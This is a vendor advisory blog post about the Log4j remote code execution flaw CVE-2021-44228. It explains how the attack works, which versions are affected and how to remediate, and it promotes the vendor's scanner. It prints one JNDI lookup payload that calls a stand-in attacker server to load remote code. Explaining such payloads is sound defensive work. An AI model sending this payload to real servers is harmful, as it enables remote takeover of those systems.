On the 9th of December, 2021, a new vulnerability CVE-2021-44228 was discovered in Log4j, a popular open-source Java logging framework distributed under Apache Software License. The vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password.
Due to the severity of this vulnerability, PingSafe strongly recommends that customers apply the updates to their library as soon as possible.
Shortly after the release of the vulnerability, PingSafe added the exploit in the scans to ensure alerts from the 0-day exploit.
The Vulnerability:
Java logging framework Log4j is used to generate logs and record the activity inside an application. The vulnerability can be exploited to allow unauthorised remote code execution on the affected servers. Hackers are still utilising the recently discovered exploit to attack the servers. The exploit lets an attacker execute malicious Java code on the vulnerable server.
- The attacker will invoke any server endpoint with a malicious payload.
- The server logs the data in the request using the Log4j library, containing the malicious payload: ${jndi:ldap://attacker-server.com}
Here, “attacker-server” refers to the hacker-owned server.
- This payload triggers the log4j vulnerability, sending a request to the attacker’s server.
- The request is made via JNDI (Java Naming and Directory Interface), which responds with a remote Java class file.
- The remote class file is injected into the server, which acts as the second triggering payload and provides remote code execution access to the attacker.
Affected Systems:
Various applications and cloud services using Apache Struts are under the radar of this attack. Security researchers have already discovered that the Log4j vulnerability can be exploited in servers operated by Apple, Cloudflare, Twitter, and other large companies.
It is highly recommended to upgrade the Log4j framework to log4j-2.15.0-rc2 or higher.
The following versions of Log4j are impacted:
2.0 <= version <= 2.14.1
You can check the PingSafe dashboard under Asset Security, find out if your servers are secure.
Steps for Remedation:
The latest version of Log4j has been released on the official website. You can download it and upgrade your service to use the newest version.
Although it is recommended to upgrade to the latest version of Log4j, you can also secure servers running on the previous versions. This can be done by adding “formatMsgNoLookups=true” to the servers running above version 2.10.0 and higher. This statement is not required for the updated version as it has become the default behaviour.
References:
How can PingSafe help?
PingSafe can detect this Log4j vulnerability on your infrastructure without having an agent in place. To protect your cloud infrastructure from this as well as new zero-day vulnerabilities, request your early access to PingSafe at https://www.pingsafe.ai/company/contactus.
.jpeg)
.png)
